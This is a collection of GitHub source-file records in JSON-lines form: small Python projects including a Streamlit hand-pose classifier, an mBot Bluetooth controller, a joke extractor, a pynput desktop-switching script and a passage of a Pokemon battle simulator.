['data/*']},\n)\n","repo_name":"gbrammer/mospipe","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5010335585","text":"i = 0 \nwhile i < 10:\n i += 1\n print(i)\n #break # to break the flow and come out of 'while loop'\nelse :\n print(\"You are out of loop\")\n\n\nwhile True:\n response = input(\"Say Something :\")\n if response == 'bye':\n break\n\n\n# break, \n# continue\n# pass pass is just a filler for loop. does Nothing","repo_name":"shailendravaichalkar/python","sub_path":"Basic 2/whileLoop.py","file_name":"whileLoop.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"75214050019","text":"# Import library\nfrom tensorflow import keras\nimport streamlit as st\nfrom PIL import ImageOps, Image\nimport numpy as np\n\n# Name page title\nst.set_page_config(page_title=\"Rock Paper Scissors\", layout=\"wide\")\nst.title(\"Rock Paper Scissors Hand Pose Prediction\")\ntry:\n # Input image\n file = st.file_uploader(\n \"Upload your hand with rock, paper, or scissors pose!\", type=[\"png\", \"jpg\"]\n )\n image = Image.open(file)\n img = ImageOps.fit(image, (224, 224))\n # Grayscale the image\n gray = ImageOps.grayscale(img)\n\n img_array = np.asarray(gray)\n x = np.expand_dims(img_array, axis=0)\n images = np.vstack([x])\n\n # get model\n model_path = \"chosen_model.hdf5\"\n model = keras.models.load_model(model_path)\n\n # Predict uploaded image with model\n classes = model.predict(images)\n\n if classes[0][0] == 1:\n st.info(\"It's Paper!\")\n elif classes[0][1] == 1:\n st.info(\"It's Rock!\")\n else:\n st.info(\"It's Scissors!\")\n left_co, cent_co, last_co = st.columns(3)\n with cent_co:\n st.image(file)\n\nexcept:\n # Set error if image isn't uploded yet\n st.error(\"Please upload your hand!\")\n st.stop()\n","repo_name":"imandreans/Rock-Paper-Scissors-Prediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35205701170","text":"#!/usr/bin/python3\n\nimport sys\nimport socket\n\nemac = '00:1B:10:60:4C:9E' # external bluetooth module MAC addr\nport = 3 # not sure\n\nclass MBot(object):\n def __init__(self, on_dist=None):\n self.s = socket.socket(socket.AF_BLUETOOTH, proto=socket.BTPROTO_RFCOMM)\n print('connecting...')\n self.s.connect((emac, port))\n self.s.setblocking(False)\n print('connected')\n \n self.sendlines = []\n self.recvbuf = bytearray()\n self.recvlines = []\n\n self.on_dist = None\n\n def reconnect(self):\n if self.s is not None: self.s.close()\n\n self.s = socket.socket(socket.AF_BLUETOOTH, proto=socket.BTPROTO_RFCOMM)\n print('connecting...', file=sys.stderr)\n self.s.connect((emac, port))\n # self.s.setblocking(False)\n print('connected', file=sys.stderr)\n\n def move(self,left_deg, right_deg, left_speed = 100, right_speed = 100):\n self.send(f\"Move,{left_deg},{right_deg},{left_speed},{right_speed}\\n\")\n\n def query_dist_cm(self):\n self.send(\"QueryDistanceCM\\n\")\n \n def send(self, msg):\n # add msg to send buffer\n self.sendlines.append(msg)\n\n try:\n while len(self.sendlines) > 0:\n # we have some buffered messages, try to send them first\n head = self.sendlines[0]\n self.s.send(bytes(head, \"UTF-8\"))\n _ = self.sendlines.pop(0)\n except BlockingIOError as e:\n print(\"Error sending messages. In queue: \" + int(len(self.sendlines)), file=sys.stderr)\n \n def read(self):\n msgbuf = []\n try:\n self.recvbuf += self.s.recv(2048)\n nl = self.recvbuf.find(b\"\\n\")\n while nl != -1:\n msgb = self.recvbuf[:nl]\n msgs = msgb.decode('UTF-8', errors='replace')\n if msgs.startswith('!'):\n msgbuf.append(msgs[1:].split(','))\n else:\n print('[rover] ' + msgs)\n self.recvbuf = self.recvbuf[nl+1:]\n nl = self.recvbuf.find(b\"\\n\")\n except BlockingIOError as e:\n pass\n return msgbuf\n","repo_name":"chrismooredev/cse314-mbot-control","sub_path":"mbot.py","file_name":"mbot.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30447666918","text":"#!/bin/python3.6\n\nimport json\nimport sys\n\nfrom mpp import Utils\n\nargs = sys.argv[1:]\nif len(args) < 2:\n print('Usage: extract_jokes.py ')\n\ndirs = args[0]\nout = args[1]\n\nfor file in Utils.get_files(dirs):\n raw = []\n if not file.endswith('.json'):\n print(file, 'is not a json file, did not read')\n continue\n\n print('Reading', file)\n with open(file, 'r', encoding='utf-8') as f:\n jokes = json.loads(f.read())\n\n # Each joke is represented as a dict of attributes\n for joke in jokes:\n full = ''\n if 'title' in joke:\n title = joke['title'].strip()\n # Trying to preserve the full context of the Reddit jokes (some will be missed unfortunately)\n if title.endswith('?'):\n full += title + ' '\n else:\n continue\n full += joke['body']\n raw.append(full)\n\n outfile = out + file[file.rfind('/'):-5] + '.txt'\n with open(outfile, 'w', encoding='utf-8') as f:\n f.write(Utils.INSTANCE_DELIMITER.join(raw))\n print('Jokes extracted.')\n\n\n","repo_name":"super-cooper/Markov-Plus-Plus","sub_path":"extract_jokes.py","file_name":"extract_jokes.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7253297940","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"learncube\",\n version=\"0.1.0\",\n author=\"Fabian Riewe\",\n author_email=\"f.riewe@bueffelheld.de\",\n description=\"A Python wrapper for the Learncube API\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Bueffelheld/learncube-python\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","repo_name":"Bueffelheld/learncube-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25172210990","text":"import argparse\nfrom Processors.mb import convert_train_dataset, convert_eval_dataset\n\n\ndef main():\n \n parser = argparse.ArgumentParser()\n\n ## Required parameters\n parser.add_argument(\"--output_folder\", default=None, type=str, required=True)\n parser.add_argument(\"--data_path\", default=None, type=str, required=True,\n help=\"folder containing a.toks, b.toks, sim.txt\")\n parser.add_argument(\"--set_name\", default='train', type=str, required=False,\n help=\"set name.\")\n parser.add_argument(\"--mode\", default='test', type=str, required=False,\n help=\"mode: train / test\")\n args = parser.parse_args()\n\n if args.mode.lower() == 'test':\n convert_eval_dataset(args.data_path, args.output_folder, args.set_name)\n elif args.mode.lower() == 'train':\n convert_train_dataset(args.data_path, args.output_folder, args.set_name)\n else : \n raise ValueError('mode must be in: train, test ')\n \n\nif __name__ == \"__main__\":\n main()","repo_name":"mbougha/MarkerBERT","sub_path":"convert_mb.py","file_name":"convert_mb.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70514262180","text":"# ~ from pynput.mouse import Button, Controller\n# ~ from pynput.keyboard import Key, Controller\nimport pynput, time\nButton = pynput.mouse.Button\nmouse = pynput.mouse.Controller()\nkeyboard = pynput.keyboard.Controller()\nKey = pynput.keyboard.Key\nlistener = pynput.mouse.Listener\n\nleftPressed = False\ndesktopCount = 4 #This needs to be changed depending on your needs\ncurrentDesktopNumber = 1\nscreenWidth = 1919 #this needs to be set on your screen width resolution -1\n\ndef f_choose(num):\n\t\t\tif num == 1:\n\t\t\t\tkeyboard.press(Key.f1)\n\t\t\telif num == 2:\n\t\t\t\tkeyboard.press(Key.f2)\n\t\t\telif num == 3:\n\t\t\t\tkeyboard.press(Key.f3)\n\t\t\telif num == 4:\n\t\t\t\tkeyboard.press(Key.f4)\n\t\t\telif num == 5:\n\t\t\t\tkeyboard.press(Key.f5)\n\t\t\telif num == 6:\n\t\t\t\tkeyboard.press(Key.f6)\n\t\t\telif num == 7:\n\t\t\t\tkeyboard.press(Key.f7)\n\t\t\telif num == 8:\n\t\t\t\tkeyboard.press(Key.f8)\n\t\t\telif num == 9:\n\t\t\t\tkeyboard.press(Key.f9)\n\t\t\telif num == 10:\n\t\t\t\tkeyboard.press(Key.f10)\n\t\t\telif num == 11:\n\t\t\t\tkeyboard.press(Key.f11)\n\t\t\telif num == 12:\n\t\t\t\tkeyboard.press(Key.f12)\n\ndef release_all():\n\t\t\tkeyboard.release(Key.shift)\n\t\t\tkeyboard.release(Key.ctrl)\n\t\t\tkeyboard.release(Key.f1)\n\t\t\tkeyboard.release(Key.f2)\n\t\t\tkeyboard.release(Key.f3)\n\t\t\tkeyboard.release(Key.f4)\n\t\t\tkeyboard.release(Key.f5)\n\t\t\tkeyboard.release(Key.f6)\n\t\t\tkeyboard.release(Key.f7)\n\t\t\tkeyboard.release(Key.f8)\n\t\t\tkeyboard.release(Key.f9)\t#I am too lazy :D\n\t\t\tkeyboard.release(Key.f10)\n\t\t\tkeyboard.release(Key.f11)\n\t\t\tkeyboard.release(Key.f12)\n\ndef on_click(x, y, button, pressed):\n global leftPressed\n if button == pynput.mouse.Button.left:\n if pressed:\n leftPressed = True\n else:\n leftPressed = False\n\n\n# ~ while True:\ndef on_move(x, y):\n\t#time.sleep(0.05)\n\tglobal currentDesktopNumber\n\ttry:\n\t\tif (mouse.position[0] == 0):\n\t\t\tmouse.position = (screenWidth, mouse.position[1])\n\t\t\t\n\t\t\tif (currentDesktopNumber > 1):\n\t\t\t\tcurrentDesktopNumber=currentDesktopNumber-1\n\t\t\telse:\n\t\t\t\tcurrentDesktopNumber = desktopCount\n\t\t\t\n\t\t\t# ~ print (currentDesktopNumber)\n\t\t\t\t\t\t\n\t\t\tif (leftPressed):\n\t\t\t\t# ~ print (\"window held\")\n\t\t\t\tkeyboard.press(Key.ctrl)\n\t\t\t\tkeyboard.press(Key.shift) #put the switch window desktop extra key shortcut/command\n\t\t\t\tmouse.release(Button.left) # just because... probably does not help\n\t\t\t\tf_choose(currentDesktopNumber)\n\t\t\t\trelease_all()\n\t\t\t\n\t\t\tkeyboard.press(Key.ctrl)\n\t\t\tf_choose(currentDesktopNumber)\n\t\t\trelease_all()\n\t\t\t\n\t\t\t\n\t\telif (mouse.position[0] == screenWidth):\n\t\t\tmouse.position = (1, mouse.position[1])\n\t\t\t\n\t\t\tif (currentDesktopNumber < desktopCount):\n\t\t\t\tcurrentDesktopNumber=currentDesktopNumber+1\n\t\t\telse:\n\t\t\t\tcurrentDesktopNumber = 1\n\t\t\t\n\t\t\t# ~ print (currentDesktopNumber)\n\t\t\t\t\t\t\t\t\t\n\t\t\tif (leftPressed):\n\t\t\t\t# ~ print (\"window held\")\n\t\t\t\tkeyboard.press(Key.ctrl)\n\t\t\t\tkeyboard.press(Key.shift) #put the switch window desktop extra key shortcut/command\n\t\t\t\tmouse.release(Button.left) # just because... probably does not help\n\t\t\t\tf_choose(currentDesktopNumber)\n\t\t\t\trelease_all()\n\t\t\t\n\t\t\tkeyboard.press(Key.ctrl)\n\t\t\tf_choose(currentDesktopNumber)\n\t\t\trelease_all()\n\t\t\t\n\texcept Exception as e:\n\t\tprint(\"ERROR:\", e)\n\nlistener = pynput.mouse.Listener(\n on_move=on_move,\n on_click=on_click)\nlistener.start()\nlistener.join()\n\n\n\n# ~ # Read pointer position\n# ~ print('The current pointer position is {0}'.format(\n # ~ mouse.position))\n\n# ~ # Set pointer position\n# ~ mouse.position = (10, 20)\n# ~ print('Now we have moved it to {0}'.format(\n # ~ mouse.position))\n\n# ~ # Move pointer relative to current position\n# ~ mouse.move(5, -5)\n\n# ~ # Press and release\n# ~ mouse.press(Button.left)\n# ~ mouse.release(Button.left)\n\n# ~ # Double click; this is different from pressing and releasing\n# ~ # twice on macOS\n# ~ mouse.click(Button.left, 2)\n\n# ~ # Scroll two steps down\n# ~ mouse.scroll(0, 2)\n","repo_name":"CactiChameleon9/Switch-desktop-on-edge-python-script","sub_path":"slideOnEdge.py","file_name":"slideOnEdge.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29509435268","text":"from logging import BufferingFormatter\r\nimport random\r\nimport math\r\nfrom AccuracyCheck import accuracyCheck\r\nfrom ParseAttack import parseAttack\r\nfrom ParseItem import parseItem\r\nfrom Stage2Mult import stage2Mult\r\nimport tkinter\r\nfrom tkinter import *\r\nfrom tkinter.messagebox import showerror\r\nfrom PIL import Image\r\n\r\n\r\nclass Battle:\r\n\r\n def options(self,trainer):\r\n team = trainer.team\r\n moveset = team[0].moveset\r\n pp = team[0].PP\r\n availableMoves = []\r\n moveAddresses = []\r\n movePP = []\r\n for i in range(len(pp)):\r\n if pp[i]>0:\r\n availableMoves.append(moveset[i])\r\n moveAddresses.append(i)\r\n movePP.append(pp[i])\r\n availableSwaps = []\r\n swapAddresses = []\r\n for p in range(len(team)-1):\r\n if team[p+1].HP>0:\r\n availableSwaps.append(team[p+1])\r\n swapAddresses.append(p+1)\r\n availableActions = {\r\n \"pokeOut\":team[0],\r\n \"moves\":availableMoves,\r\n \"pp\":movePP,\r\n \"swaps\":availableSwaps,\r\n \"swapAddresses\":swapAddresses,\r\n \"items\":trainer.items\r\n }\r\n return availableActions\r\n \r\n def disableCheck(self,pokeChar):\r\n if (pokeChar.disable != \"\"):\r\n pokeChar.turncount[\"disable\"] = pokeChar.turncount[\"disable\"]-1\r\n if pokeChar.turncount[\"disable\"] == 0:\r\n print(pokeChar.poke[\"name\"]+\"'s \"+pokeChar.disable+\" is no longer disabled!\")\r\n pokeChar.disable = \"\"\r\n\r\n def metronome(self,pokeAttacker,pokeDefender,moveAddress,attacker,defender):\r\n # metronome will do something strange -- it will pick a random move (other than metronome) and then execute that move. To use the parse attack function as written, we first switch out the move in its own moveset, then change it back to metronome after the attack is carried out.\r\n\r\n # if a twoturn move was used by metronome\r\n if pokeAttacker.buffer != \"\":\r\n for i in range(len(self.moveInfo[\"moves\"])):\r\n if self.moveInfo[\"moves\"][i][\"name\"].casefold()==\"metronome\":\r\n metronomeMove = self.moveInfo[\"moves\"][i]\r\n moveToUse = pokeAttacker.buffer\r\n print(pokeAttacker.poke[\"name\"]+ \" is attacking with \"+ moveToUse[\"name\"]+\"!\")\r\n pokeAttacker.moveset[moveAddress] = moveToUse #briefly make the move different\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n pokeAttacker.moveset[moveAddress] = metronomeMove\r\n pokeAttacker.buffer = \"\"\r\n return result\r\n\r\n moveList = []\r\n for i in range(len(self.moveInfo[\"moves\"])):\r\n if self.moveInfo[\"moves\"][i][\"name\"] not in [\"Metronome\",\"Mirror Move\",\"Struggle\",\"Mimic\"]:\r\n moveList.append(self.moveInfo[\"moves\"][i])\r\n elif self.moveInfo[\"moves\"][i][\"name\"] == \"Metronome\":\r\n metronomeMove = self.moveInfo[\"moves\"][i]\r\n moveToUse = random.sample(moveList,1)[0]\r\n pokeAttacker.moveset[moveAddress] = moveToUse #briefly make the move different\r\n print(\"Metronome landed on \"+moveToUse[\"name\"]+\"!\")\r\n # must handle counter and twoturn moves differently\r\n if moveToUse[\"name\"] == \"Counter\":\r\n print(\"The move did nothing!\")\r\n return \"\"\r\n elif moveToUse[\"category\"] == [\"twoturn\",\"bide\",\"bindlike\",\"thrashlike\",\"rage\"]:\r\n pokeAttacker.buffer = moveToUse\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n pokeAttacker.moveset[moveAddress] = metronomeMove\r\n else:\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n # now bring metronome back\r\n pokeAttacker.moveset[moveAddress] = metronomeMove\r\n if result not in [\"fail:confuse\",\"fail:paralyze\"]:\r\n pokeDefender.mirrorable = \"metronome\"\r\n return result\r\n\r\n def mirrormove(self,pokeAttacker,pokeDefender,moveAddress,attacker,defender):\r\n # mirror move will do something strange -- it will try to use and then execute that move. To use the parse attack function as written, we first switch out the move in its own moveset, then change it back to metronome after the attack is carried out.\r\n \r\n # if a twoturn move was used by mirror move\r\n if pokeAttacker.buffer != \"\":\r\n for i in range(len(self.moveInfo[\"moves\"])):\r\n if self.moveInfo[\"moves\"][i][\"name\"].casefold()==\"mirror move\":\r\n mirrormoveMove = self.moveInfo[\"moves\"][i]\r\n moveToUse = pokeAttacker.buffer\r\n print(pokeAttacker.poke[\"name\"]+ \" is attacking with \"+ moveToUse[\"name\"]+\"!\")\r\n pokeAttacker.moveset[moveAddress] = moveToUse #briefly make the move different\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n pokeAttacker.moveset[moveAddress] = mirrormoveMove\r\n pokeAttacker.buffer = \"\"\r\n return result \r\n \r\n for i in range(len(self.moveInfo[\"moves\"])):\r\n if self.moveInfo[\"moves\"][i][\"name\"].casefold()==pokeAttacker.mirrorable.casefold():\r\n moveToUse = self.moveInfo[\"moves\"][i]\r\n if self.moveInfo[\"moves\"][i][\"name\"].casefold()==\"mirror move\":\r\n mirrormoveMove = self.moveInfo[\"moves\"][i]\r\n if pokeAttacker.mirrorable == \"\":\r\n moveToUse = mirrormoveMove\r\n pokeAttacker.moveset[moveAddress] = moveToUse #briefly make the move different\r\n \r\n if moveToUse[\"name\"].casefold() == \"metronome\":\r\n result = self.metronome(pokeAttacker,pokeDefender,moveAddress,attacker,defender)\r\n pokeAttacker.moveset[moveAddress] = mirrormoveMove\r\n return result\r\n\r\n elif moveToUse[\"category\"] == \"twoturn\":\r\n pokeAttacker.buffer = moveToUse\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n pokeAttacker.moveset[moveAddress] = mirrormoveMove\r\n return result\r\n\r\n if moveToUse[\"name\"].casefold() != \"mirror move\":\r\n print(pokeAttacker.poke[\"name\"] + \" is trying to mirror \"+moveToUse[\"name\"]+\"!\")\r\n \r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n # now bring mirror move back, so long as charging is over\r\n pokeAttacker.moveset[moveAddress] = mirrormoveMove\r\n if result not in [\"fail:confuse\",\"fail:paralyze\"]:\r\n pokeDefender.mirrorable = \"mirror move\"\r\n\r\n \r\n return result\r\n\r\n def statusCheck(self,character,pokeChar,pokeNot):\r\n loss = False\r\n toSwitch = False\r\n # burn, poison and toxic all do damage based on the toxic counter, which is bizarre but true!\r\n if pokeChar.status == \"burn\":\r\n burnDamage = min(pokeChar.HP,max(math.ceil(pokeChar.maxHP/16),pokeChar.turncount[\"toxic\"]*math.ceil(pokeChar.maxHP/16)))\r\n pokeChar.activeStats[0] = pokeChar.HP-burnDamage\r\n pokeChar.setStats()\r\n print(pokeChar.poke[\"name\"] + \" took \"+str(burnDamage)+ \" damage from its burn!\")\r\n elif pokeChar.status == \"poison\":\r\n poisonDamage = min(pokeChar.HP,max(math.ceil(pokeChar.maxHP/16),pokeChar.turncount[\"toxic\"]*math.ceil(pokeChar.maxHP/16)))\r\n pokeChar.activeStats[0] = pokeChar.HP-poisonDamage\r\n pokeChar.setStats()\r\n print(pokeChar.poke[\"name\"] + \" took \"+str(poisonDamage)+ \" damage from poison!\")\r\n if (pokeChar.HP!=0) and pokeChar.leechSeed:\r\n leechDamage = min(pokeChar.HP,max(math.ceil(pokeChar.maxHP/16),pokeChar.turncount[\"toxic\"]*math.ceil(pokeChar.maxHP/16)))\r\n pokeChar.activeStats[0] = pokeChar.HP-leechDamage\r\n pokeChar.setStats()\r\n print(pokeChar.poke[\"name\"] + \" took \"+str(leechDamage)+ \" damage from Leech Seed!\")\r\n leechHeal = min(leechDamage,pokeNot.maxHP-pokeNot.HP)\r\n if leechHeal!=0:\r\n pokeNot.activeStats[0] = pokeNot.HP+leechHeal\r\n pokeNot.setStats()\r\n print(pokeNot.poke[\"name\"] + \" healed \"+str(leechHeal)+ \" from Leech Seed!\")\r\n\r\n if pokeChar.HP == 0:\r\n pokeChar.status = \"faint\"\r\n #print(pokeChar.poke[\"name\"]+\" has fainted!\")\r\n options = []\r\n for i in range(len(character.team)):\r\n if character.team[i].status != \"faint\":\r\n options.append(i)\r\n if options == []:\r\n #print(character.name + \" has no Pokemon left to battle.\")\r\n #print(character.name + \" has lost the battle!\")\r\n loss = True\r\n else:\r\n toSwitch = True\r\n\r\n # the pokeCharmon hasn't fainted\r\n if pokeChar.turncount[\"toxic\"]!=0:\r\n pokeChar.turncount[\"toxic\"] = pokeChar.turncount[\"toxic\"]+1 \r\n return [loss,toSwitch]\r\n\r\n\r\n def attackPhase(self,optionPlayer,optionEnemy):\r\n # a strange turn will occur if one of the characters is recharging.\r\n # bools for which player is attacking.\r\n # handled differently if one or both attack.\r\n playerIs = optionPlayer[0]==\"attack\"\r\n enemyIs = optionEnemy[0]==\"attack\"\r\n firstToSwitch = False\r\n secondToSwitch = False\r\n # if only one player tried an attack, the process is easier\r\n if not (playerIs and enemyIs):\r\n if playerIs:\r\n # only player is attacking\r\n attacker=self.player\r\n moveAddress = optionPlayer[1]\r\n defender=self.enemy\r\n first = \"player\"\r\n second = \"enemy\"\r\n else:\r\n # only enemy is attacking\r\n attacker=self.enemy\r\n moveAddress = optionEnemy[1]\r\n defender=self.player\r\n first = \"enemy\"\r\n second = \"player\"\r\n pokeAttacker=attacker.team[0]\r\n pokeDefender=defender.team[0]\r\n # check if attack will land\r\n if (pokeAttacker.status not in [\"sleep\",\"freeze\"]) and (pokeAttacker.turncount[\"bound\"]==-1):\r\n print(pokeAttacker.poke[\"name\"]+ \" is attacking \"+ pokeDefender.poke[\"name\"]+ \" with \" + pokeAttacker.moveset[moveAddress][\"name\"])\r\n if pokeAttacker.moveset[moveAddress][\"name\"] not in [\"Mirror Move\",\"Metronome\"]:\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n elif pokeAttacker.moveset[moveAddress][\"name\"] == \"Metronome\":\r\n result = self.metronome(pokeAttacker,pokeDefender,moveAddress,attacker,defender)\r\n elif pokeAttacker.moveset[moveAddress][\"name\"] == \"Mirror Move\":\r\n result = self.mirrormove(pokeAttacker,pokeDefender,moveAddress,attacker,defender)\r\n #handle the case where either player's pokemon has fainted\r\n [firstToSwitch,secondToSwitch,lossAttacker,lossDefender]=self.checkResult(result,attacker,defender)\r\n if lossAttacker:\r\n if lossDefender:\r\n return \"loss:both\"\r\n else:\r\n return \"loss:\"+first\r\n elif lossDefender:\r\n return \"loss:\"+second\r\n\r\n # poison and burn damage apply if neither player's pokemon fainted, take status damage and check again\r\n if not (firstToSwitch or secondToSwitch):\r\n [lossAttacker,firstToSwitch] = self.statusCheck(attacker,pokeAttacker,pokeDefender)\r\n if lossAttacker:\r\n return \"loss:\"+first\r\n # this is the case where only one pokemon attacked, which means the defender has swapped/used an item. \r\n # This means they will take status damage at the end of the turn, i.e. here, so long as nobody fainted\r\n if not (firstToSwitch or secondToSwitch):\r\n [lossDefender,secondToSwitch] = self.statusCheck(defender,pokeDefender,pokeAttacker)\r\n if lossDefender:\r\n return \"loss:\"+second \r\n\r\n else:\r\n # this is the case where both players attacked! We need to \r\n # 1) determine whose move goes first by checking priority and speed. In gen 1 there are only two priority moves:\r\n # Quick Attack, which goes first, and Counter, which goes second. \r\n # 2) check if the first move goes through\r\n # 3) if yes, determine the effect of the first move\r\n # 4) check if the second move goes through, which includes the possibility that either pokemon has died\r\n # or that a status (wrap, sleep, etc.) has been incurred\r\n # 5) if yes, determine the effect of the second move\r\n firstStatusChecked = False\r\n playerMove = self.player.team[0].moveset[optionPlayer[1]]\r\n enemyMove = self.enemy.team[0].moveset[optionEnemy[1]]\r\n prio = [0,0]\r\n if (playerMove[\"name\"] == \"Quick Attack\"):\r\n prio[0] = 1\r\n if (enemyMove[\"name\"] == \"Quick Attack\"):\r\n prio[1] = 1\r\n if (playerMove[\"name\"] == \"Counter\"):\r\n prio[0] = -1\r\n if (enemyMove[\"name\"] == \"Counter\"):\r\n prio[1] = -1\r\n if prio[0]>prio[1]:\r\n first=\"player\"\r\n elif prio[1]>prio[0]:\r\n first=\"enemy\"\r\n else:\r\n # check speed if there is a priority tie\r\n # implement speed stat stages and paralysis here\r\n playerSpeed = self.player.team[0].speed\r\n enemySpeed = self.enemy.team[0].speed\r\n \r\n if playerSpeed == enemySpeed:\r\n # speed tie case. coin toss\r\n speedRoll = random.randint(0,1)\r\n if speedRoll==0:\r\n first = \"player\"\r\n else:\r\n first = \"enemy\"\r\n elif playerSpeed>enemySpeed:\r\n first=\"player\"\r\n else:\r\n first=\"enemy\"\r\n # now we know who went first, so we have to process the first attack\r\n if first == \"player\":\r\n second = \"enemy\"\r\n # player is attacking\r\n attacker=self.player\r\n moveAddress = optionPlayer[1]\r\n defender=self.enemy\r\n else:\r\n second = \"player\"\r\n # enemy is attacking\r\n attacker=self.enemy\r\n moveAddress = optionEnemy[1]\r\n defender=self.player\r\n pokeAttacker=attacker.team[0]\r\n pokeDefender=defender.team[0]\r\n if (pokeAttacker.status not in [\"sleep\",\"freeze\"]) and (pokeAttacker.turncount[\"bound\"]==-1):\r\n print(pokeAttacker.poke[\"name\"]+ \" is attacking \"+ pokeDefender.poke[\"name\"]+ \" with \" + pokeAttacker.moveset[moveAddress][\"name\"])\r\n\r\n if (playerMove[\"name\"] == \"Counter\") and (enemyMove[\"name\"] == \"Counter\"):\r\n print(\"Counter failed!\")\r\n pokeAttacker.lastDamage[0] = 0\r\n result = \"\" \r\n elif pokeAttacker.moveset[moveAddress][\"name\"] not in [\"Mirror Move\",\"Metronome\"]:\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n elif pokeAttacker.moveset[moveAddress][\"name\"] == \"Metronome\":\r\n result = self.metronome(pokeAttacker,pokeDefender,moveAddress,attacker,defender)\r\n elif pokeAttacker.moveset[moveAddress][\"name\"] == \"Mirror Move\":\r\n result = self.mirrormove(pokeAttacker,pokeDefender,moveAddress,attacker,defender)\r\n\r\n# check for possible losses or deaths\r\n [firstToSwitch,secondToSwitch,lossAttacker,lossDefender]=self.checkResult(result,attacker,defender)\r\n if lossAttacker:\r\n if lossDefender:\r\n return \"loss:both\"\r\n else:\r\n return \"loss:\"+first\r\n elif lossDefender:\r\n return \"loss:\"+second\r\n # poison and burn damage apply if neither player's pokemon fainted, take status damage and check again\r\n if not (firstToSwitch or secondToSwitch):\r\n [lossAttacker,firstToSwitch] = self.statusCheck(attacker,pokeAttacker,pokeDefender)\r\n firstStatusChecked = True # if not, we have to check at the end of the turn\r\n if lossAttacker:\r\n return \"loss:\"+first\r\n\r\n # now the first attack is over. many things can happen as a result of the first attack.\r\n # the defender may have died, the attack may have been disabled, they might have been statused\r\n # the attacker also may have died due to recoil, confusion, poison, burn or explosion/selfdestruct\r\n \r\n # this is the case that the defender is still alive after the turn\r\n if result not in [\"defender:faint\",\"both:faint\",\"unable\"]:\r\n if first == \"player\":\r\n # enemy is attacking now\r\n attacker=self.enemy\r\n moveAddress = optionEnemy[1]\r\n defender=self.player\r\n else:\r\n # player is attacking\r\n attacker=self.player\r\n moveAddress = optionPlayer[1]\r\n defender=self.enemy\r\n pokeAttacker=attacker.team[0]\r\n pokeDefender=defender.team[0]\r\n if not pokeAttacker.flinching:\r\n if (pokeAttacker.status not in [\"sleep\",\"freeze\"]) and (pokeAttacker.turncount[\"bound\"]==-1):\r\n print(pokeAttacker.poke[\"name\"]+ \" is attacking \"+ pokeDefender.poke[\"name\"]+ \" with \" + pokeAttacker.moveset[moveAddress][\"name\"])\r\n if (playerMove[\"name\"] == \"Counter\") and (enemyMove[\"name\"] == \"Counter\"):\r\n print(\"Counter failed!\")\r\n pokeAttacker.lastDamage[0] = 0\r\n result = \"\" \r\n elif pokeAttacker.moveset[moveAddress][\"name\"] not in [\"Mirror Move\", \"Metronome\"]:\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n elif pokeAttacker.moveset[moveAddress][\"name\"] == \"Metronome\":\r\n result = self.metronome(pokeAttacker,pokeDefender,moveAddress,attacker,defender)\r\n elif pokeAttacker.moveset[moveAddress][\"name\"] == \"Mirror Move\":\r\n result = self.mirrormove(pokeAttacker,pokeDefender,moveAddress,attacker,defender)\r\n\r\n [secondToSwitch,firstToSwitch,lossAttacker,lossDefender]=self.checkResult(result,attacker,defender)\r\n if lossAttacker:\r\n if lossDefender:\r\n return \"loss:both\"\r\n else:\r\n return \"loss:\"+second\r\n elif lossDefender:\r\n return \"loss:first\"\r\n else:\r\n print(pokeAttacker.poke[\"name\"] + \" flinched!\")\r\n pokeAttacker.flinching=False\r\n \r\n # status gets checked here so long as the pokemon didn't faint or knock out its opponent\r\n if not (secondToSwitch or (result == \"defender:faint\")):\r\n if result not in [\"sleep\",\"freeze\",\"flinch\"]:\r\n self.disableCheck(pokeAttacker)\r\n [lossAttacker,secondToSwitch] = self.statusCheck(attacker,pokeAttacker,pokeDefender)\r\n if lossAttacker:\r\n return \"loss:\"+second\r\n if not firstStatusChecked:\r\n 